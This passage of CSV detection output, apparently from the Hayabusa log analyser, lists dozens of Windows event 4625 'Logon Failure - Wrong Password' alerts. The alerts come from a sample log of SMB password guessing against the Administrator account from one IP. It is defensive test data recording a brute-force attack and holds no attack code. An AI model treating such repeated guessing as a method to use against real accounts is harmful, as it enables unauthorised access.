NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.576 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tPg2LKgWMeM0Oqo0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.604 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dbzL9T2d4RdeCz4q : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.653 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PeEfbWpoipfYtOKv : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: RKJW1vSrIAbRTzyB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.730 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aU4G8NBru22Vc4Cl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.768 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sacBcqxV97FUihrd : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.821 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 41Ms0lEMeT0jYxYj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:39.859 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: AkQWVEHGM1NxowR0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.906 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 4qKqRY7L2IQRoU57 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:39.954 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: eMIkvwbvqc9V6CFs : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.001 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: PehzjCnK42ZPUE7e : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.049 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 1fqw2GWiYfO0kU83 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.094 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: WFPJJNCFdPJl4igl : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.149 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zc6CrAr7YoozKB6r : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.192 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: xHXminAIeV4ZJIK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.241 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 06YmUCHNZqbaZMdZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.282 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fYoENCtP2uPy9xNh : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.333 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: TRJRuXJTTH1afAfH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:40.381 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MpnkzTlc3Uvj3hpY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.425 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oIuD8haFzR8P87rL : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.475 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XL1IreMAiE564NXN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.520 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: vMUiCaMGBC46MnPJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.560 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MOSWbwooyb60LExG : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.597 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: oSDNF7s3vbtkZIOz : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.641 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: JBMk0qOV6237XtK3 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.694 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j41R1U1tYPvApCkZ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.737 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: OcPkVZSeg5VwChW8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: aDLxt5gaFDTKsiVl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 94JvBKdxJkawQQMT : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:40.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KgBMk00K3iC1GQem : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.901 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: XdGOj9Ybm6bcCo3p : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.950 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: by6F4YKorxhp5ahn : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:40.993 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: b1G6ZOgOaV6luDQN : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.046 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: qqSwNfvpPLQd6ZH1 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.087 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mxtJJj54xSzHibHI : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.129 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 2Y3yznfdaZ7dtwDO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.168 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: esllFn4asbLxwkBu : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.202 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 5Pr0cgd6cF5ukhZ8 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.249 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: pS2fabTrbl6rZ1NB : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.305 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: FkylDDmUyuT57HdH : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:41.337 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Aqs8rSvuLAQuhfDp : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.380 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: KI07KTgBJc4kBSKY : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.421 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Re3n3nJ8EEhRRT3G : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.465 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: BzspAC3z1csEn0Ve : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.505 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: tpkb6bf42SLUst3z : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.546 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I1F5d2wn60OgAExW : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.600 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bhPNRHWhTyonDPuA : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.642 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: zEsnyWpUuHVBo6et : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.685 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: I2FwaWy9TALkk9eU : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.778 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: fuikeQsxlOUVifVj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.824 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: ZWdsRJp9fHypPI1d : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:41.860 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0j0IBX2eZnx99n9 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.909 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: YIZ5Knxg0xr0WmDb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.953 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: Wuej3f7mEoWmd4SX : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:41.998 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: B0LcCi06ilIhFPwb : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.041 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: jWsCGgoFmH06rRf4 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.093 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: bP47JjNKqtYIZPsC : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.140 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: mNlWZ9o0xf7bl2d0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.186 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: hnPnB2lEN3BSDpXJ : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.228 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: dVMyeF9jGuzHkTHg : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.269 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: sDKLl3PjW2qrzJGa : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.316 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: rkllnePSq3NQ5wgC : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
01:51:42.359 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: j9qLWgQnR7P9cs7s : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.408 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: C1AdU07nzvv7RB2i : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.452 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cHgiB5SMiQtsl5oD : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.499 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: 03e7QOn36l0jH35H : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.548 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: DoJBywV8x8cURwrO : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.583 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: SDYGYO6s6g6Dbx8r : IP Address: 192.168.198.149 : AuthPackage: 
NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.621 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: nUqXpeTNePFyBmCo : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.657 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: T2h0qJWcbzRe1GSj : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.697 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: edsfNOovOl1Ow503 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.740 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: cxCC83XLMIJrNMvl : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 01:51:42.785 +09:00,DESKTOP-M5SN04R,4625,low,Logon Failure - Wrong Password,User: Administrator : Type: 3 : Workstation: MzussOcg5ihdrnD0 : IP Address: 192.168.198.149 : AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx -2016-09-20 
